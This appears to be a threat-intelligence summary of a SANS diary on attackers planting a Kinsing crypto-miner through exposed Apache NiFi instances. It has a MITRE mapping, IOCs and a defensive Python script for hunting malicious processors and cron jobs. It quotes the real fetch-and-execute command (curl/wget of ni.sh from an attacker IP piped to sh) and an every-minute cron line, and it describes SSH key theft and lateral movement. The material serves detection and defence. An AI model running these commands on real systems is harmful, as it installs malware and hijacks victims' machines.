Attackers are actively scanning for unprotected Apache NiFi instances and adding a malicious processor that downloads and runs the Kinsing crypto miner, while also attempting lateral movement with SSH keys harvested from the victim. Persistence is achieved through a cron job that re-downloads the script every minute, and the script itself is piped into a shell rather than being saved to disk; the strongest defenses are not exposing NiFi to the Internet and following NiFi's authentication and password guidance. #ApacheNiFi #Kinsing #Aliyun
Keypoints
- Active Internet scanning targets unprotected (unauthenticated, Internet-exposed) Apache NiFi deployments.
- Attack #1 adds a NiFi processor whose command downloads ni.sh from a remote server and runs it; ni.sh in turn fetches the Kinsing crypto miner.
- The processor is scheduled, so the fetch-and-execute runs repeatedly; ni.sh is piped straight into sh and is never written to disk.
MITRE Techniques
- [T1046] Network Service Discovery – The actor scans the Internet for unprotected NiFi instances. Quote: ‘At least one actor is actively scanning the Internet for unprotected instances of Apache NiFi.’
- [T1059.004] Unix Shell – The processor runs bash -c to fetch ni.sh with curl (falling back to wget) and pipe it straight into sh, so the script never touches disk. Quote: '"Command": "bash", "Command Arguments": "-c "(curl -s 194.38.20.32/ni.sh||wget -q -O- 194.38.20.32/ni.sh)|sh"'
- [T1105] Ingress Tool Transfer – The downloaded script pulls the crypto miner from the same remote server. Quote: 'The script downloads the crypto coin miner from http://194.38.20.32/kinsing.'
- [T1496] Resource Hijacking – The Kinsing crypto miner (a Go binary, not xmrig) is installed and run on the NiFi host. Quote: 'The crypto coin miner isn't remarkable; other than that, it isn't xmrig. Kinsing is written in Go…'
- [T1053.003] Scheduled Task/Job: Cron – Persistence via a cron job that re-downloads and runs ni.sh every minute, under the account NiFi runs as. Quote: 'A cron job is added to re-download and run ni.sh every minute. This cron job will run as the current user running NiFi.'
- [T1552.004] Unsecured Credentials: Private Keys – The script harvests SSH key files from the victim's home directory. Quote: 'It collects SSH keys from the victim's home directory…'
- [T1021.004] Remote Services: SSH – Lateral movement: the script attempts to connect to other hosts using every key it found. Quote: 'It will try to connect to all hosts using the key files it found.'
- [T1071.001] Web Protocols – C2 traffic over HTTP(S) to fetch commands and report back. Quote: ‘GET /mg HTTP/1.1…’ (example of C2 traffic).
- [T1562.004] Impair Defenses: Disable or Modify System Firewall – The malware disables the host firewall as part of its actions. Quote: 'It disables the firewall.'
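The two persistence artefacts above, a command-running NiFi processor and an every-minute cron job, are both easy to hunt for once you know the shape. The following Python is an added example, not code from the SANS diary or the Apache NiFi project. It reads the JSON shape NiFi's REST API returns for GET /nifi-api/process-groups/{id}/processors and plain crontab text, and flags fetch-and-execute patterns. Treating the quoted "Command" / "Command Arguments" pair as an ExecuteProcess processor is an inference (those are that processor's property names; the diary does not name the type), and every input below is constructed for the example; the malicious entries mirror the diary quotes.

```python
"""Hunt for Kinsing-style persistence on an Apache NiFi host.

Added example, not code from the SANS diary or the NiFi project.
Check 1: walk a NiFi processor listing and flag processors that execute
OS commands, rating them "high" when a property carries a remote
fetch-and-execute.  Check 2: apply the same patterns to crontab lines
and note the every-minute schedule.  All sample input is constructed.
"""
import re

# NiFi standard processors that run arbitrary OS commands or scripts.
COMMAND_PROCESSORS = {
    "org.apache.nifi.processors.standard.ExecuteProcess",
    "org.apache.nifi.processors.standard.ExecuteStreamCommand",
    "org.apache.nifi.processors.script.ExecuteScript",
}

# (label, regex) pairs; a hit on any of them rates a finding "high".
SUSPICIOUS = [
    ("download-and-execute pipe",
     re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b")),
    ("shell -c wrapper", re.compile(r"\b(?:ba)?sh\s+-c\b")),
    ("raw-IP URL", re.compile(r"(?:https?://)?\b(?:\d{1,3}\.){3}\d{1,3}/\S+")),
    ("known payload host", re.compile(r"\b194\.38\.20\.32\b")),  # IOC above
]

# The five-asterisk "every minute" cron schedule.
EVERY_MINUTE = re.compile(r"^\s*\*\s+\*\s+\*\s+\*\s+\*\s+")


def _matches(text):
    return [label for label, rx in SUSPICIOUS if rx.search(text)]


def find_suspicious_processors(listing):
    """Findings for processors that run commands or carry fetch-and-execute
    strings. `listing` is the dict from GET .../process-groups/{id}/processors."""
    findings = []
    for entity in listing.get("processors", []):
        comp = entity.get("component", {})
        config = comp.get("config", {})
        props = config.get("properties") or {}
        # Join values in order (unset NiFi properties are null) so that
        # "Command" and "Command Arguments" read as one command line.
        text = " ".join(str(v) for v in props.values() if v is not None)
        hits = _matches(text)
        if not hits and comp.get("type") not in COMMAND_PROCESSORS:
            continue
        findings.append({
            "id": comp.get("id"),
            "name": comp.get("name"),
            "type": comp.get("type"),
            "schedule": config.get("schedulingPeriod"),
            "hits": hits,
            "severity": "high" if hits else "review",
        })
    return findings


def find_suspicious_cron(lines):
    """Crontab lines carrying fetch-and-execute patterns; an every-minute
    schedule on such a line is recorded as an extra indicator."""
    findings = []
    for line in lines:
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        hits = _matches(stripped)
        if hits and EVERY_MINUTE.match(stripped):
            hits.append("every-minute schedule")
        if hits:
            findings.append({"line": stripped, "hits": hits})
    return findings


# Constructed sample input (same JSON shape as the NiFi REST listing).
SAMPLE_LISTING = {"processors": [
    {"id": "a1", "component": {"id": "a1", "name": "GetFile",
        "type": "org.apache.nifi.processors.standard.GetFile",
        "config": {"schedulingPeriod": "0 sec",
                   "properties": {"Input Directory": "/data/in", "File Filter": None}}}},
    {"id": "b2", "component": {"id": "b2", "name": "ExecuteProcess",
        "type": "org.apache.nifi.processors.standard.ExecuteProcess",
        "config": {"schedulingPeriod": "60 sec", "properties": {
            "Command": "bash",
            "Command Arguments": '-c "(curl -s 194.38.20.32/ni.sh||wget -q -O- 194.38.20.32/ni.sh)|sh"',
            "Batch Duration": None}}}},
    {"id": "c3", "component": {"id": "c3", "name": "Nightly report",
        "type": "org.apache.nifi.processors.standard.ExecuteStreamCommand",
        "config": {"schedulingPeriod": "1 day", "properties": {
            "Command Path": "/opt/reports/run.sh", "Command Arguments": "--date today"}}}},
]}

# Constructed crontab of the NiFi service account.
SAMPLE_CRONTAB = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
    "* * * * * (curl -s 194.38.20.32/ni.sh||wget -q -O- 194.38.20.32/ni.sh)|sh > /dev/null 2>&1",
]

if __name__ == "__main__":
    for f in find_suspicious_processors(SAMPLE_LISTING):
        print(f"[{f['severity']}] {f['type']} id={f['id']} every {f['schedule']}: {f['hits']}")
    for c in find_suspicious_cron(SAMPLE_CRONTAB):
        print(f"[cron] {c['hits']}: {c['line']}")
```

Against a live instance, feed find_suspicious_processors the JSON from GET /nifi-api/process-groups/root/processors (with whatever token your NiFi is configured to require) and find_suspicious_cron the output of crontab -l for the account NiFi runs as, since the diary notes the cron job is created under that user. Any command-executing processor is reported at "review" even without a pattern hit; on most flows there should be few enough to eyeball.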
Indicators of Compromise
- [IP Address] context – 194.38.20.32 hosts the payloads (ni.sh, kinsing, spr.sh, spre.sh); scanning/source addresses observed: 109.237.96.124, 109.207.200.43; further addresses seen with URL paths: 31.184.240.34/x, 93.189.46.81/h2
- [Domain] context – external lookups made by the attacker's scripts: icanhazip.com (victim public IP lookup) and Alibaba Cloud domains such as update.aegis.aliyun.com. Both are legitimate services contacted by the malware rather than attacker-controlled infrastructure, so treat them as weak indicators on their own and correlate with the other artefacts.
- [URL] context – malicious fetches: http://194.38.20.32/ni.sh, http://194.38.20.32/kinsing, http://194.38.20.32/spre.sh, http://194.38.20.32/spr.sh
- [File Hash] context – hashes of downloaded/constructed malicious files: f0514bd8eb232f7314e230dc314a4e90572b8ed63dbcc9c55814b4dae8697206, 5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d (and 6 more hashes)
- [File Name] context – notable file names observed in artifacts: ni.sh, kinsing, spr.sh, spre.sh
Read more: https://isc.sans.edu/diary/rss/29900